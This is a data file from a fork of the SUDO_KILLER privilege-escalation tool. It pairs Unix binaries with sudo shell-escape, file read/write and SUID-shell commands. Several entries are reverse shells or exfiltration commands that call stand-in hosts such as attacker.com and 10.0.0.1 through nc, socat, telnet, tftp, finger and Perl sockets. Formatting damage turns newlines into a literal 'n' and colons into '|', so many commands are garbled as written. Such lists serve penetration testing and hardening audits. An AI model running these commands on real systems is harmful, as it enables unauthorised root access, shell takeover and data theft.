forked from TH3xACE/SUDO_KILLER
bins.txt
"apt"| "apt-get changelog aptn!/bin/shn",
"apt-get"| "apt-get changelog aptn!/bin/shn",
"aria2c"| "COMMAND='id'nTF=$(mktemp)necho "$COMMAND" > $TFnchmod +x $TFnaria2c --on-download-error=$TF http|//xn",
"ash"| "ash",
"awk"| "awk 'BEGIN {system("/bin/sh")}'",
"base64"| "LFILE=file_to_readnbase64 "$LFILE" | base64 --decoden",
"bash"| "bash",
"busybox"| "busybox sh",
"cat"| "LFILE=file_to_readncat "$LFILE"n",
"chmod"| "LFILE=file_to_changensudo chmod 0777 $LFILEn",
"chown"| "LFILE=file_to_changensudo chown $(id -un)|$(id -gn) $LFILEn",
"cp"| "LFILE=file_to_writenTF=$(mktemp)necho "DATA" > $TFnsudo cp $TF $LFILEn",
"cpulimit"| "cpulimit -l 100 -f /bin/sh",
"crontab"| "crontab -e",
"csh"| "csh",
"curl"| "LFILE=/tmp/file_to_readncurl file|//$LFILEn",
"cut"| "LFILE=file_to_readncut -d "" -f1 "$LFILE"n",
"dash"| "dash",
"date"| "LFILE=file_to_readndate -f $LFILEn",
"dd"| "LFILE=file_to_writenecho "DATA" | dd of=$LFILEn",
"diff"| "LFILE=file_to_readndiff --line-format=%L /dev/null $LFILEn",
"docker"| "sudo docker run --rm -v /home/$USER|/h_docs ubuntu n sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -pn",
"ed"| "edn!/bin/shn",
"emacs"| "emacs -Q -nw --eval '(term "/bin/sh")'",
"env"| "env /bin/sh",
"expand"| "LFILE=file_to_readnexpand "$LFILE"n",
"expect"| "expect -c 'spawn /bin/sh;interact'",
"facter"| "TF=$(mktemp -d)necho 'exec("/bin/sh")' > $TF/x.rbnFACTERLIB=$TF factern",
"find"| "find . -exec /bin/sh ; -quit",
"finger"| "RHOST=attacker.comnLFILE=file_to_sendnfinger "$(base64 $LFILE)@$RHOST"n",
"flock"| "flock -u / /bin/sh",
"fmt"| "LFILE=file_to_readnfmt -pNON_EXISTING_PREFIX "$LFILE"n",
"fold"| "LFILE=file_to_readnfold -w99999999 "$LFILE"n",
"ftp"| "ftpn!/bin/shn",
"gdb"| "gdb -nx -ex '!sh' -ex quit",
"git"| "PAGER='sh -c "exec sh 0<&1"' git -p help",
"head"| "LFILE=file_to_readnhead -c1G "$LFILE"n",
"ionice"| "ionice /bin/sh",
"jq"| "LFILE=file_to_readnjq -Rr . "$LFILE"n",
"ksh"| "ksh",
"ld.so"| "/lib/ld.so /bin/sh",
"less"| "less /etc/profilen!/bin/shn",
"ltrace"| "ltrace -b -L /bin/sh",
"lua"| "lua -e 'os.execute("/bin/sh")'",
"mail"| "TF=$(mktemp)necho "From nobody@localhost $(date)" > $TFnmail -f $TFn!/bin/shn",
"make"| "COMMAND='/bin/sh'nmake -s --eval=$'x|nt-'"$COMMAND"n",
"man"| "man mann!/bin/shn",
"more"| "TERM= more /etc/profilen!/bin/shn",
"mount"| "sudo mount -o bind /bin/sh /bin/mountnsudo mountn",
"mv"| "LFILE=file_to_writenTF=$(mktemp)necho "DATA" > $TFnsudo mv $TF $LFILEn",
"mysql"| "mysql -e '! /bin/sh'",
"nano"| "TF=$(mktemp)necho 'exec sh' > $TFnchmod +x $TFnnano -s $TF /etc/hostsn^Tn",
"nc"| "RHOST=attacker.comnRPORT=12345nsudo nc -e /bin/sh $RHOST $RPORTn",
"nice"| "nice /bin/sh",
"nl"| "LFILE=file_to_readnnl -bn -w1 -s '' $LFILEn",
"nmap"| "TF=$(mktemp)necho 'os.execute("/bin/sh")' > $TFnnmap --script=$TFn",
"node"| "node -e 'require("child_process").spawn("/bin/sh", {stdio| [0, 1, 2]});'n",
"od"| "LFILE=file_to_readnod -An -c -w9999 "$LFILE"n",
"perl"| "perl -e 'exec "/bin/sh";' " # "sudo /usr/bin/perl -e 'exec("/bin/bash")'" # "sudo /usr/perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">");open(STDOUT,">");open(STDERR,">");exec("/bin/sh -i");};'"
"pg"| "pg /etc/profilen!/bin/shn",
"php"| "export CMD="/bin/sh"nphp -r 'system(getenv("CMD"));'n",
"pico"| "TF=$(mktemp)necho 'exec sh' > $TFnchmod +x $TFnpico -s $TF /etc/hostsn^Tn",
"pip"| "TF=$(mktemp -d)necho 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.pynpip install $TFn",
"puppet"| "puppet apply -e "exec { '/bin/sh -c "exec sh -i <$(tty) >$(tty) 2>$(tty)"'| }"n",
"python2"| "python2 -c 'import os; os.system("/bin/sh")'",
"python3"| "python3 -c 'import os; os.system("/bin/sh")'",
"red"| "red file_to_writenanDATAn.nwnqn",
"rlwrap"| "rlwrap /bin/sh",
"rpm"| "rpm --eval '%{lua|posix.exec("/bin/sh")}'",
"rpmquery"| "rpmquery --eval '%{lua|posix.exec("/bin/sh")}'",
"rsync"| "rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1|/dev/null",
"ruby"| "ruby -e 'exec "/bin/sh"'",
"scp"| "TF=$(mktemp)necho 'sh 0<&2 1>&2' > $TFnchmod +x "$TF"nscp -S $TF x y|n",
"sed"| "sed -n '1e exec sh 1>&0' /etc/hosts",
"setarch"| "setarch $(arch) /bin/sh",
"sftp"| "HOST=user@attacker.comnsftp $HOSTn!/bin/shn",
"shuf"| "LFILE=file_to_writenshuf -e DATA -o "$LFILE"n",
"smbclient"| "smbclient ipsharen!/bin/shn",
"socat"| "RHOST=attacker.comnRPORT=12345nsudo -E socat tcp-connect|$RHOST|$RPORT exec|sh,pty,stderr,setsid,sigint,sanen",
"sort"| "LFILE=file_to_readnsort -m "$LFILE"n",
"sqlite3"| "sqlite3 /dev/null '.shell /bin/sh'",
"ssh"| "ssh localhost $SHELL --noprofile --norc",
"stdbuf"| "stdbuf -i0 /bin/sh",
"strace"| "strace -o /dev/null /bin/sh",
"tail"| "LFILE=file_to_readntail -c1G "$LFILE"n",
"tar"| "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
"taskset"| "taskset 1 /bin/sh",
"tclsh"| "tclshnexec /bin/sh <@stdin >@stdout 2>@stderrn",
"tcpdump"| "COMMAND='id'nTF=$(mktemp)necho "$COMMAND" > $TFnchmod +x $TFntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TFn",
"tee"| "LFILE=file_to_writenecho DATA | ./tee -a "$LFILE"n",
"telnet"| "RHOST=attacker.comnRPORT=12345ntelnet $RHOST $RPORTn^]n!/bin/shn",
"tftp"| "RHOST=attacker.comnsudo -E tftp $RHOSTnput file_to_sendn",
"time"| "/usr/bin/time /bin/sh",
"timeout"| "timeout 7d /bin/sh",
"ul"| "LFILE=file_to_readnul "$LFILE"n",
"unexpand"| "LFILE=file_to_readnunexpand -t99999999 "$LFILE"n",
"uniq"| "LFILE=file_to_readnuniq "$LFILE"n",
"unshare"| "unshare /bin/sh",
"vi"| "vi -c '|!/bin/sh'",
"vim"| "vim -c '|!/bin/sh'",
"watch"| "watch -x sh -c 'reset; exec sh 1>&0 2>&0'",
"wget"| "export URL=http|//attacker.com/file_to_getnexport LFILE=file_to_savensudo -E wget $URL -O $LFILEn",
"whois"| "RHOST=attacker.comnRPORT=12345nLFILE=file_to_savenwhois -h $RHOST -p $RPORT > "$LFILE"n",
"wish"| "wishnexec /bin/sh <@stdin >@stdout 2>@stderrn",
"xargs"| "xargs -a /dev/null sh",
"xxd"| "LFILE=file_to_writenecho DATA | xxd | xxd -r - "$LFILE"n",
"zip"| "TF=$(mktemp -u)nzip $TF /etc/hosts -T -TT 'sh #'nrm $TFn",
"zsh"| "zsh"